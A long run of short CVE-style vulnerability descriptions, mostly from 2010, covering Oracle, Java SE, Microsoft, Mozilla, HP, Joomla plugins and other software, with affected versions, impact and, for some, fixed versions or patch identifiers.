Unspecified vulnerability in Microsoft IIS 6.0, 7.0, and 7.5, when Extended Protection for Authentication is enabled, allows remote authenticated users to execute arbitrary code via unknown vectors related to "token checking" that trigger memory corruption, aka "IIS Authentication Memory Corruption Vulnerability."
Unspecified vulnerability in Google Chrome before 4.1.249.1036 allows remote attackers to trigger the omission of a download warning dialog via unknown vectors.
Unspecified vulnerability in Google Chrome before 4.1.249.1036 allows remote attackers to truncate the URL shown in the HTTP Basic Authentication dialog via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x before 3.0.6 and 3.1.x before 3.1.1, and SeaMonkey before 2.0.6 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the JavaScript engine in Mozilla Firefox 3.5.x before 3.5.10 and 3.6.x before 3.6.4, Thunderbird before 3.0.5, and SeaMonkey before 2.0.5 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.5.x before 3.5.10, Thunderbird before 3.0.5, and SeaMonkey before 2.0.5 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.5.x before 3.5.10 and 3.6.x before 3.6.4, Thunderbird before 3.0.5, and SeaMonkey before 2.0.5 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the administrative console in IBM WebSphere Application Server (WAS) 7.0.x before 7.0.0.9 on z/OS have unknown impact and attack vectors.
Unspecified vulnerability in Mozilla Firefox 3.5.x through 3.5.8 allows remote attackers to cause a denial of service (memory corruption and application crash) and possibly have unknown other impact via vectors that might involve compressed data, a different vulnerability than CVE-2010-1028.
Unspecified vulnerability in Safari 4 on Apple Mac OS X 10.6 allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by Charlie Miller during a Pwn2Own competition at CanSecWest 2010.
Unspecified vulnerability in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to a use-after-free issue, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010.
Heap-based buffer overflow in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to discover the base address of a Windows .dll file, and possibly have unspecified other impact, via unknown vectors, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010.
Multiple SQL injection vulnerabilities in searchmatch.php in ScriptsFeed Dating Software allow remote attackers to execute arbitrary SQL commands via the (1) txtgender and (2) txtlookgender parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in login_reset_password_page.php in Tracking Requirements &amp; Use Cases (TRUC) 0.11.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
fs/namei.c in Linux kernel 2.6.18 through 2.6.34 does not always follow NFS automount "symlinks," which allows attackers to have an unknown impact, related to LOOKUP_FOLLOW.
The nfs_wait_on_request function in fs/nfs/pagelist.c in Linux kernel 2.6.x through 2.6.33-rc5 allows attackers to cause a denial of service (Oops) via unknown vectors related to truncating a file and an operation that is not interruptible.
The azx_position_ok function in hda_intel.c in Linux kernel 2.6.33-rc4 and earlier, when running on the AMD780V chip set, allows context-dependent attackers to cause a denial of service (crash) via unknown manipulations that trigger a divide-by-zero error.
Multiple directory traversal vulnerabilities in OI.Blogs 1.0.0, when magic_quotes_gpc is disabled, allow remote attackers to read arbitrary files via directory traversal sequences in the (1) theme parameter to loadStyles.php and the (2) scripts parameter to javascript/loadScripts.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Entry Level CMS (EL CMS) allows remote attackers to inject arbitrary web script or HTML via the subj parameter, which is not properly handled in a forced SQL error message.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple directory traversal vulnerabilities in Phpkobo Free Real Estate Contact Form 1.09, when magic_quotes_gpc is disabled, allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the LANG_CODE parameter to (1) codelib/cfg/common.inc.php, (2) form/app/common.inc.php, and (3) staff/app/common.inc.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple directory traversal vulnerabilities in Phpkobo Short URL 1.01, when magic_quotes_gpc is disabled, allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the LANG_CODE parameter to (1) url/app/common.inc.php and (2) codelib/cfg/common.inc.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in staff/app/common.inc.php in Phpkobo Address Book Script 1.09, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the LANG_CODE parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in index.php in AudiStat 1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) year and (2) mday parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in index.php in AudiStat 1.3 allow remote attackers to execute arbitrary SQL commands via the (1) year and (2) month parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Microsoft Windows Media Player 11 does not properly perform colorspace conversion, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted .AVI file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the single sign-on functionality in the Web Services implementation in IBM DB2 Content Manager (CM) Toolkit 8.3 before FP13 on z/OS and DB2 Information Integrator for Content 8.3 before FP13 has unknown impact and remote attack vectors.
The "IP address range limitation" function in OpenPNE 1.6 through 1.8, 2.0 through 2.8, 2.10 through 2.14, and 3.0 through 3.4, when mobile device support is enabled, allows remote attackers to bypass the "simple login" functionality via unknown vectors related to spoofing.
Unspecified vulnerability in HP System Insight Manager before 6.0 allows remote authenticated users to gain privileges via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP System Insight Manager before 6.0 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple unspecified vulnerabilities in HP Virtual Machine Manager (VMM) before 6.0 allow remote authenticated users to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP System Management Homepage (SMH) 6.0 before 6.0.0-95 on Linux, and 6.0 before 6.0.0.96 on Windows, allows remote authenticated users to obtain sensitive information, modify data, and cause a denial of service via unknown vectors.
Unspecified vulnerability in HP HP-UX B.11.11 allows local users to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Insight Control for Linux (aka IC-Linux or ICE-LX) 2.11 and earlier allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in HP-UX B.11.31, with AudFilter rules enabled, allows local users to cause a denial of service via unknown vectors.
Unspecified vulnerability in the Power Extension Manager (ch_lightem) extension 1.0.34 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown vectors.
A vulnerability, which was classified as problematic, was found in Acritum Femitter Server 1.04. Affected is an unknown function. The manipulation leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250446 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in Stars Alliance PsychoStats up to 3.2.2a. This affects an unknown part of the file upload/admin/login.php. The manipulation of the argument ref leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 3.2.2b is able to address this issue. The identifier of the patch is 5d3b7311fd5085ec6ea1b1bfa9a05285964e07e4. It is recommended to upgrade the affected component. The identifier VDB-230265 was assigned to this vulnerability.
A vulnerability was found in frioux ptome. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The patch is named 26829bba67858ca0bd4ce49ad50e7ce653914276. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218519.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in simplesamlphp simplesamlphp-module-openidprovider up to 0.8.x. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file templates/trust.tpl.php. The manipulation of the argument StateID leads to cross site scripting. The attack can be launched remotely. Upgrading to version 0.9.0 is able to address this issue. The identifier of the patch is 8365d48c863cf06ccf1465cc0a161cefae29d69d. It is recommended to upgrade the affected component. The identifier VDB-218473 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability was found in Information Cards Module on simpleSAMLphp and classified as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 1.0 is able to address this issue. The identifier of the patch is f6bfea49ae16dc6e179df8306d39c3694f1ef186. It is recommended to upgrade the affected component. The identifier VDB-217661 was assigned to this vulnerability.
A vulnerability classified as critical was found in gesellix titlelink on Joomla. Affected by this vulnerability is an unknown functionality of the file plugin_content_title.php. The manipulation of the argument phrase leads to sql injection. The patch is named b4604e523853965fa981a4e79aef4b554a535db0. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217351.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic has been found in SimpleSAMLphp simplesamlphp-module-openid. Affected is an unknown function of the file templates/consumer.php of the component OpenID Handler. The manipulation of the argument AuthState leads to cross site scripting. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 1.0 is able to address this issue. The patch is identified as d652d41ccaf8c45d5707e741c0c5d82a2365a9a3. It is recommended to upgrade the affected component. VDB-217170 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
Multiple unspecified vulnerabilities in Visualization Library before 2009.08.812 have unknown impact and attack vectors.
Unspecified vulnerability in secldapclntd in IBM AIX 5.3 with SP 5300-11-02 allows attackers to cause a denial of service (LDAP login failure) via unknown vectors.  NOTE: some of these details are obtained from third party information.  NOTE: there may be no attacker role, and the issue may be triggered entirely by an administrator's installation of an official service pack.
Multiple unspecified vulnerabilities in the UltraLite functionality in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.281 for Domino 8.0.2 FP4 have unknown impact and attack vectors.
Unspecified vulnerability in Oracle OpenSolaris 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to rdist.
Unspecified vulnerability in the Oracle Advanced Product Catalog component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in Oracle Sun Convergence 1.0 allows remote attackers to affect confidentiality via unknown vectors related to Mail, Calendar, Address Book, and Instant Messaging.
Unspecified vulnerability in the Oracle Applications Manager component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Listener component in Oracle Database Server 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Data Server component in Oracle TimesTen In-Memory Database 7.0.6.0 and 11.2.1.4.1 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.2 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 12.1.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle Secure Backup 10.3.0.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2010-0898, CVE-2010-0899, CVE-2010-0904, and CVE-2010-0906.
Unspecified vulnerability in Oracle Secure Backup 10.3.0.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Applications Manager component in Oracle E-Business Suite 11.5.10.2 and 12.0.4 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in Oracle Secure Backup 10.3.0.1 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Net Foundation Layer component in Oracle Database Server 9.2.0.8, 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1, when running on Windows, allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle OLAP component in Oracle Database Server 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Export component in Oracle Database Server 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Select Any Dictionary.
Unspecified vulnerability in the Network Layer component in Oracle Database Server 9.2.0.8, 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1, when running on Windows, allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in Oracle Secure Backup 10.3.0.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2010-0898, CVE-2010-0907, and CVE-2010-0906.
Unspecified vulnerability in Oracle Secure Backup 10.3.0.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Sun Java System Directory Server component in Oracle Sun Product Suite 5.2, 6.0, 6.1, 6.2, 6.3, and 6.3.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Directory Service Markup Language.
Unspecified vulnerability in the Sun Convergence component in Oracle Sun Product Suite 1.0 allows remote attackers to affect confidentiality via unknown vectors related to Address Book and Mail Filter.
Unspecified vulnerability in the Solaris component in Oracle Sun Product Suite OpenSolaris snv_119 allows local users to affect integrity and availability via unknown vectors related to IP Filter.
Unspecified vulnerability in the Sun Java System Access Manager component in Oracle Sun Product Suite 7.1, 7 2005Q4, and OpenSSO Enterprise 8.0 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Sun Convergence component in Oracle Sun Product Suite 1.0 allows remote attackers to affect confidentiality via unknown vectors related to Mail.
Unspecified vulnerability in the Application Express component in Oracle Database Server 3.2.0.00.27 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Sun Management Center component in Oracle Sun Product Suite 3.6.1 and 4.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Solaris Container Manager.
Unspecified vulnerability in the Solaris component in Oracle Sun Product Suite 10 and OpenSolaris snv_01 through snv_98 allows local users to affect availability via unknown vectors related to the Kernel.
Unspecified vulnerability in the Solaris component in Oracle Sun Product Suite OpenSolaris snv_68 through snv_128 allows local users to affect confidentiality via unknown vectors related to the Kernel.
Unspecified vulnerability in the Sun Ray Server Software component in Oracle Sun Product Suite 4.0, 4.1, and 4.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Device Services.
Unspecified vulnerability in the New Java Plug-in component in Oracle Java SE and Java for Business JDK and JRE 6 Update 18 and 19 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE and Java for Business JDK and JRE 6 Update 10 through 19 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Sun Java System Communications Express component in Oracle Sun Product Suite 6 2005Q4 (6.2) and and 6.3 allows remote authenticated users to affect confidentiality via unknown vectors related to Address Book.
Unspecified vulnerability in the Sun Cluster component in Oracle Sun Product Suite 3.1 and 3.2 allows local users to affect confidentiality via unknown vectors related to Data Service for Oracle E-Business Suite, a different vulnerability than CVE-2010-0883.
Unspecified vulnerability in the Sun Cluster component in Oracle Sun Product Suite 3.1 and 3.2 allows local users to affect confidentiality via unknown vectors related to Data Service for Oracle E-Business Suite, a different vulnerability than CVE-2010-0884.
Unspecified vulnerability in the Solaris component in Oracle Sun Product Suite 10 and OpenSolaris snv_134 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Trusted Extensions.
Unspecified vulnerability in the User Interface Components in Oracle Collaboration Suite 10.1.2.4 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.49.26 and 8.50.07 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.49.26 and 8.50.07 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.49.26 and 8.50.07 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.49.26 and 8.50.07 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Communications - Oracle Communications Unified Inventory Management component in Oracle Industry Product Suite 7.1 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Data Server component in Oracle TimesTen In-Memory Database 7.0.6.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Internet Directory component in Oracle Fusion Middleware 10.1.2.3 and 10.1.4.3 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle E-Business Suite 5.5.05.07, 5.5.06.00, and 6.0.03 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.2 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the JavaVM component in Oracle Database 10.2.0.4, 11.1.0.7, and 11.2.0.1.0 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the JavaVM component in Oracle Database 11.1.0.7 and 11.2.0.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Agile Engineering Data Management component in Oracle E-Business Suite 6.1.1.0 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Retail - Oracle Retail Place In-Season component in Oracle Industry Product Suite 12.2 allows remote attackers to affect integrity via unknown vectors related to Online Help.
Unspecified vulnerability in the Retail - Oracle Retail Plan In-Season component in Oracle Industry Product Suite 12.2 allows remote attackers to affect integrity via unknown vectors related to Online Help.
Unspecified vulnerability in the Retail - Oracle Retail Markdown Optimization component in Oracle Industry Product Suite 13.1 allows remote attackers to affect integrity via unknown vectors related to Online Help.
Unspecified vulnerability in the Oracle HRMS (Self Service) component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.2 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, and 11.1.0.7 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to the Create User privilege.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2 ATG RUP6 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.2 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Workflow Cartridge component in Oracle E-Business Suite 11.5.10.2 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the Portal component in Oracle Fusion Middleware 10.1.2.3 and 10.1.4.2 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Portal component in Oracle Fusion Middleware 10.1.2.3 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2010-0086.
Unspecified vulnerability in the Oracle Internet Directory component in Oracle Database 9.2.0.8, 9.2.0.8, and DV; and Oracle Fusion Middleware 10.1.2.3 and 10.1.4.0.1; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the XML DB component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the XML DB component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Java 2D component in Oracle Java SE and Java for Business 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java 2D component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the March 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is a heap-based buffer overflow in a decoding routine used by the JPEGImageDecoderImpl interface, which allows code execution via a crafted JPEG image.
Unspecified vulnerability in the Java 2D component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java 2D component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the March 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is a heap-based buffer overflow that allows arbitrary code execution via a crafted image.
Unspecified vulnerability in the ImageIO component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the March 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is a heap-based buffer overflow that allows remote attackers to execute arbitrary code, related to an "invalid assignment" and inconsistent length values in a JPEG image encoder (JPEGImageEncoderImpl).
Unspecified vulnerability in the HotSpot Server component in Oracle Java SE and Java for Business 6 Update 18, 5.0, Update, and 23 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the March 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is for improper parsing of a crafted MIDI stream when creating a MixerSequencer object, which causes a pointer to be corrupted and allows a NULL byte to be written to arbitrary memory.
Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the March 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is related to XNewPtr and improper handling of an integer parameter when allocating heap memory in the com.sun.media.sound libraries, which allows remote attackers to execute arbitrary code.
Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the March 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is an uncontrolled array index that allows remote attackers to execute arbitrary code via a MIDI file with a crafted MixerSequencer object, related to the GM_Song structure.
Unspecified vulnerability in the ImageIO component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the March 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is an integer overflow in the Java Runtime Environment that allows remote attackers to execute arbitrary code via a JPEG image that contains subsample dimensions with large values, related to JPEGImageReader and "stepX".
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the March 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is related to improper checks when executing privileged methods in the Java Runtime Environment (JRE), which allows attackers to execute arbitrary code via (1) an untrusted object that extends the trusted class but has not modified a certain method, or (2) "a similar trust issue with interfaces," aka "Trusted Methods Chaining Remote Code Execution Vulnerability."
Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java 2D component in Oracle Java SE and Java for Business 6 Update 18, 5.0, Update, and 23 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the March 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is a stack-based buffer overflow using an untrusted size value in the readMabCurveData function in the CMM module in the JVM.
Unspecified vulnerability in the Pack200 component in Oracle Java SE and Java for Business 6 Update 18, 5.0, Update, and 23 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Knowledge Management component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Wireless component in Oracle Fusion Middleware 10.1.2.3 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Windows OpenType Compact Font Format (CFF) driver in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users to execute arbitrary code via unknown vectors related to improper validation when copying data from user mode to kernel mode, aka "OpenType CFF Font Driver Memory Corruption Vulnerability."
Multiple unspecified vulnerabilities in the Microsoft Internet Explorer 8 Developer Tools ActiveX control in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via unknown vectors that "corrupt the system state," aka "Microsoft Internet Explorer 8 Developer Tools Vulnerability."
Cross-site request forgery (CSRF) vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.35 and 7.0 before 7.0.0.13 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple directory traversal vulnerabilities in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the (1) file parameter to libraries/jquery/js/ui/jsloader.php and the (2) files[] parameter to libraries/jquery/js/jsloader.php, a different vector than CVE-2010-0759.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the tb-send.rb (TrackBack transmission) plugin in tDiary 2.2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors, possibly related to the (1) plugin_tb_url and (2) plugin_tb_excerpt parameters.
SQL injection vulnerability in default.asp in ASPCode CMS 1.5.8, 2.0.0 Build 103, and possibly other versions, allows remote attackers to execute arbitrary SQL commands via the newsid parameter when the sec parameter is 26.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the IP-Tech JQuarks (com_jquarks) Component before 0.2.4 for Joomla! allows attackers to obtain the installation path for Joomla! via unknown vectors.
Unspecified vulnerability in MoinMoin 1.5.x through 1.7.x, 1.8.x before 1.8.7, and 1.9.x before 1.9.2 has unknown impact and attack vectors, related to configurations that have a non-empty superuser list, the xmlrpc action enabled, the SyncPages action enabled, or OpenID configured.
Unspecified vulnerability in eMBox in Novell eDirectory 8.8 SP5 Patch 2 and earlier allows remote attackers to cause a denial of service (crash) via unknown a crafted SOAP request, a different issue than CVE-2008-0926.
Cross-site request forgery (CSRF) vulnerability in WebCalendar 1.2.0 allows remote attackers to hijack the authentication of administrators for requests that change the administrative password via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site request forgery (CSRF) vulnerabilities in WebCalendar 1.2.0, and other versions before 1.2.5, allow remote attackers to hijack the authentication of administrators for requests that (1) delete an event or (2) ban an IP address from posting via unknown vectors.  NOTE: some of these details are obtained from third party information.
Unspecified vulnerability in Fast Lexical Analyzer Generator (flex) before 2.5.35 has unknown impact and attack vectors.
Unspecified vulnerability in Citrix XenServer 5.0 Update 3 and earlier, and 5.5, allows local users to bypass authentication and execute unspecified Xen API (XAPI) calls via unknown vectors.
Cross-site scripting (XSS) vulnerability in ajax.php in evalSMSI 2.1.03 allows remote attackers to inject arbitrary web script or HTML via the return parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in viewfile.php in ARWScripts Fonts Script allows remote attackers to read arbitrary local files via directory traversal sequences in a base64-encoded f parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in DocumentManager before 4.0 has unknown impact and attack vectors, related to file rights.
SQL injection vulnerability in header.php in NovaBoard 1.1.2 allows remote attackers to execute arbitrary SQL commands via the nova_name cookie parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the SIP implementation on the Cisco PGW 2200 Softswitch with software before 9.7(3)S10 allows remote attackers to cause a denial of service (device crash) via unknown SIP traffic, as demonstrated by "SIP testing," aka Bug ID CSCsk38165.
Cross-site scripting (XSS) vulnerability in Cisco Router and Security Device Manager (SDM) allows remote attackers to inject arbitrary web script or HTML via unknown vectors, aka Bug ID CSCtb38467.
